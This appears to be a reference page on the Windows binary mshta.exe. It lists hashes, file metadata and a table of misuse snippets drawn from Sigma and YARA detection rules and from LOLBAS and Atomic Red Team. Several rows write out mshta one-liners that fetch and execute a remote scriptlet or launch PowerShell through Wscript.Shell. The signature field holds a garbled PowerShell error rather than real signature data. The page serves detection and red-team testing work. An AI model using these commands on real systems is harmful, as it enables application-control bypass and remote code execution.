mshta.exePermalink

  • File Path: C:\windows\system32\mshta.exe
  • Description: Microsoft (R) HTML Application host

HashesPermalink

Type Hash
MD5 A3871DED5ED88F59C0D1396761708F81
SHA1 CB699E0A77F216A78D0D43867837FFF77B1B4D15
SHA256 A5E64D89AC3B70AA8D02717C5AB69EC79714E9BD6765D17474ABAFEE3409044C
SHA384 6337388BEF8A73154B8BAA177FC50EE855CDC64353BB9ECE26E076F1AF38E34CDFC6770E00EBB5E22451604E6A809DC1
SHA512 C68DF6FFE792458BD37D96A70CD0001D0AB83D77AAAD26C8BC2163500A2B3609C213E015CE056E65E26BFA60C85DFDF41789959C196ACF07DFC9204ED40A6C06
SSDEEP 192:5WZ8por+TPlBrzUPpGpd4FmxZBbgUPmT7plon7LWwWVIR:O8Q+ZBrwPpO4MvbgT7mWwW

SignaturePermalink

  • Status: The file C:\windows\system32\mshta.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File MetadataPermalink

  • Original Filename: MSHTA.EXE.MUI
  • Product Name: Internet Explorer
  • Company Name: Microsoft Corporation
  • File Version: 11.00.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 11.00.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible MisusePermalink

The following table contains possible examples of mshta.exe being misused. While mshta.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\mshta.exe' DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services_security.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services_security.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services_security.yml - 'mshta' DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma win_invoke_obfuscation_via_use_mshta_services.yml - 'mshta' DRL 1.0
sigma sysmon_cactustorch.yml - '\System32\mshta.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\mshta.exe' DRL 1.0
sigma file_event_win_susp_clr_logs.yml - 'mshta' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\mshta.exe' DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\mshta.exe' DRL 1.0
sigma image_load_susp_script_dotnet_clr_dll_load.yml - '\mshta.exe' DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_mhsta.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_mhsta.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma posh_pm_invoke_obfuscation_via_use_mhsta.yml Payload\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_mhsta.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_mhsta.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma posh_ps_invoke_obfuscation_via_use_mhsta.yml ScriptBlockText\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
sigma proc_creation_win_apt_babyshark.yml - powershell.exe mshta.exe http* DRL 1.0
sigma proc_creation_win_apt_lazarus_activity_apr21.yml - 'mshta' DRL 1.0
sigma proc_creation_win_apt_lazarus_activity_apr21.yml - 'C:\Windows\System32\mshta.exe' DRL 1.0
sigma proc_creation_win_apt_ta505_dropper.yml description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents DRL 1.0
sigma proc_creation_win_apt_ta505_dropper.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_exploit_cve_2017_11882.yml description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_mhsta.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_mhsta.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma proc_creation_win_invoke_obfuscation_via_use_mhsta.yml CommandLine\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
sigma proc_creation_win_lethalhta.yml title: MSHTA Spwaned by SVCHOST DRL 1.0
sigma proc_creation_win_lethalhta.yml description: Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report DRL 1.0
sigma proc_creation_win_lethalhta.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_lolbins_by_office_applications.yml - 'mshta' DRL 1.0
sigma proc_creation_win_lolbins_with_wmiprvse_parent_process.yml - 'mshta' DRL 1.0
sigma proc_creation_win_mshta_javascript.yml title: Mshta JavaScript Execution DRL 1.0
sigma proc_creation_win_mshta_javascript.yml description: Identifies suspicious mshta.exe commands. DRL 1.0
sigma proc_creation_win_mshta_javascript.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml title: MSHTA Spawning Windows Shell DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml description: Detects a Windows command line executable started from MSHTA DRL 1.0
sigma proc_creation_win_mshta_spawn_shell.yml ParentImage\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - 'mshta' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - '*mshta*' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_possible_applocker_bypass.yml #- '\mshta.exe' DRL 1.0
sigma proc_creation_win_public_folder_parent.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_script_event_consumer_spawn.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml title: Mshta Spawning Windows Shell DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml description: Detects a suspicious child process of a mshta.exe process DRL 1.0
sigma proc_creation_win_shell_spawn_mshta.yml ParentImage\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_shell_spawn_susp_program.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_covenant.yml - 'mshta file.hta' DRL 1.0
sigma proc_creation_win_susp_csc.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_execution.yml title: MSHTA Suspicious Execution 01 DRL 1.0
sigma proc_creation_win_susp_mshta_execution.yml description: Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism DRL 1.0
sigma proc_creation_win_susp_mshta_execution.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml title: Suspicious MSHTA Process Patterns DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml description: Detects suspicious mshta process patterns DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - https://www.echotrail.io/insights/search/mshta.exe DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml Image\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_susp_mshta_pattern.yml - 'mshta' DRL 1.0
sigma proc_creation_win_susp_powershell_parent_process.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_regsvr32_anomalies.yml ParentImage\|endswith: '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_env_folder.yml - 'mshta.exe' DRL 1.0
sigma proc_creation_win_susp_script_exec_from_temp.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_susp_system_user_anomaly.yml - '\mshta.exe' DRL 1.0
sigma proc_creation_win_task_folder_evasion.yml description: The Tasks folder in system32 and syswow64 are globally writable paths. Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_mshta_services.yml title: Invoke-Obfuscation Via Use MSHTA DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_mshta_services.yml description: Detects Obfuscated Powershell via use MSHTA in Scripts DRL 1.0
sigma driver_load_invoke_obfuscation_via_use_mshta_services.yml ImagePath\|re: '(?i).*(set).*(&&).*(mshta).*(vbscript:createobject).*(\.run).*\(window\.close\).*"' DRL 1.0
LOLBAS Mshta.yml Name: Mshta.exe  
LOLBAS Mshta.yml - Command: mshta.exe evilfile.hta  
LOLBAS Mshta.yml - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))  
LOLBAS Mshta.yml - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();  
LOLBAS Mshta.yml - Command: mshta.exe "C:\ads\file.txt:file.hta"  
LOLBAS Mshta.yml - Path: C:\Windows\System32\mshta.exe  
LOLBAS Mshta.yml - Path: C:\Windows\SysWOW64\mshta.exe  
LOLBAS Mshta.yml - IOC: mshta.exe executing raw or obfuscated script within the command-line  
LOLBAS Mshta.yml - IOC: DotNet CLR libraries loaded into mshta.exe  
LOLBAS Mshta.yml - IOC: DotNet CLR Usage Log - mshta.exe.log  
LOLBAS Mshta.yml - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct  
LOLBAS Mshtml.yml Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).  
LOLBAS Url.yml Usecase: Invoke an HTML Application via mshta.exe (Default Handler).  
atomic-red-team index.md - T1218.005 Mshta MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #10: Mshta used to Execute PowerShell [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #9: Powershell invoke mshta.exe download [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - T1218.005 Mshta MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #10: Mshta used to Execute PowerShell [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #9: Powershell invoke mshta.exe download [windows] MIT License. © 2018 Red Canary
atomic-red-team matrix.md | | | SSH Authorized Keys | Systemd Timers | Mshta | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team windows-matrix.md | | | Screensaver | Time Providers CONTRIBUTE A TEST | Mshta | | | | | | | | MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md - Atomic Test #9 - Powershell invoke mshta.exe download MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md ## Atomic Test #9 - Powershell invoke mshta.exe download MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display “Download Cradle test success!”. MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md | url | url of payload to execute | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct| MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md C:\Windows\system32\cmd.exe /c “mshta.exe javascript:a=GetObject(‘script:#{url}’).Exec();close()” MIT License. © 2018 Red Canary
atomic-red-team T1059.005.md Get-WmiObject win32process | Where-Object {$.CommandLine -like “mshta”} | % { “$(Stop-Process $_.ProcessID)” } | Out-Null MIT License. © 2018 Red Canary
atomic-red-team T1204.002.md Stop-Process -name mshta MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md # T1218.005 - Mshta MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md <blockquote>Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Files may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)</blockquote> MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #2 - Mshta executes VBScript to execute malicious command MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md - Atomic Test #10 - Mshta used to Execute PowerShell MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct| MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta.exe javascript:a=(GetObject(‘script:#{file_url}’)).Exec();close(); MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #2 - Mshta executes VBScript to execute malicious command MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta vbscript:Execute(“CreateObject(““Wscript.Shell””).Run ““powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1”“:close”) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta “#{temp_file}” MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | mshta_file_path | Location of mshta.exe | String | $env:windir\system32\mshta.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md | mshta_file_path | Location of mshta.exe | Path | $env:windir\system32\mshta.exe| MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md ## Atomic Test #10 - Mshta used to Execute PowerShell MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md Use Mshta to execute arbitrary PowerShell. Example is from the 2021 Threat Detection Report by Red Canary. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta.exe “about:'" MIT License. © 2018 Red Canary
signature-base apt_babyshark.yar $x2 = /mshta.exe http:\/\/[a-z0-9.\/]{5,30}.hta/ CC BY-NC 4.0
signature-base apt_fin7.yar $x7 = “7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400” ascii /* hex encoded string ‘stem32\mshta.exe#......\Windows\Syst’ */ CC BY-NC 4.0
signature-base apt_leviathan.yar $x2 = “.Run "taskkill /im mshta.exe” ascii CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x1 = “4d534854412e4558452068747470” /* MSHTA.EXE http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x2 = “6d736874612e6578652068747470” /* mshta.exe http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x3 = “6d736874612068747470” /* mshta http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $x4 = “4d534854412068747470” /* MSHTA http */ CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar $mshta = “mshta” CC BY-NC 4.0
signature-base exploit_cve_2017_11882.yar any of ($mshta, $http, $https, $cmd, $pwsh, $exe) and any of ($equation1, $equation2) and $address CC BY-NC 4.0
signature-base exploit_cve_2017_8759.yar $s2 = /<soap:address location=”http[s]?:\/\/[^”]{8,140}mshta.exe”/ ascii wide CC BY-NC 4.0
signature-base gen_mal_scripts.yar description = “Detects MSHTA Bypass” CC BY-NC 4.0
signature-base gen_mal_scripts.yar $s3 = “/c start mshta j” ascii nocase CC BY-NC 4.0
signature-base gen_url_persitence.yar $file1 = /\x0a\x0d\s=[^\x0d](powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(.exe|)[^\x0d]{2,50}\x0d/ nocase CC BY-NC 4.0

MIT License. Copyright (c) 2020-2021 Strontic.